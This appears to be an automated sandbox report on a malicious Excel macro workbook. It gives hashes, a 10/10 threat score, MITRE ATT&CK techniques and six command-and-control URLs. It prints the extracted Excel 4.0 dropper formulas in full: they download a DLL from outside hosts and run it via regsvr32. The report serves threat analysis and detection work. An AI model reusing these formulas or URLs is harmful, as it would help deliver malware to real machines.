Overview

overview

10

Static

static

10

aavwelnn.xlsm

windows7_x64

10

aavwelnn.xlsm

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    aavwelnn

  • Size

    46KB

  • Sample

    220522-fynqgafeb5

  • MD5

    9bd3baddbdf78a835956cc1c694489dd

  • SHA1

    3116ae5b338a252985d5bd2c035245fec1b06d45

  • SHA256

    7df06f0d1cb53d8ad793f5f1906a65fa0c80bd1d8719f55aa7f26f9b89c1226e

  • SHA512

    3c8d56af7d933cb4149abd463c7ef009eca2da903992fa8ae8009c943ede57fd9dc95d6d02455b660555fcd7ed223081175623b513d928e9f9301d5c74ce0d4a

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://eles-tech.com/css/KzMysMqFMs/

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

https://txpcrescue.com/cgi-bin/5tSO8/

http://hadramout21.com/jetpack-temp/Py/

http://haribuilders.com/zoombox-master/4HYGX/

http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://eles-tech.com/css/KzMysMqFMs/
xlm40.dropper

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

Targets

    • Target

      aavwelnn

    • Size

      46KB

    • MD5

      9bd3baddbdf78a835956cc1c694489dd

    • SHA1

      3116ae5b338a252985d5bd2c035245fec1b06d45

    • SHA256

      7df06f0d1cb53d8ad793f5f1906a65fa0c80bd1d8719f55aa7f26f9b89c1226e

    • SHA512

      3c8d56af7d933cb4149abd463c7ef009eca2da903992fa8ae8009c943ede57fd9dc95d6d02455b660555fcd7ed223081175623b513d928e9f9301d5c74ce0d4a

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks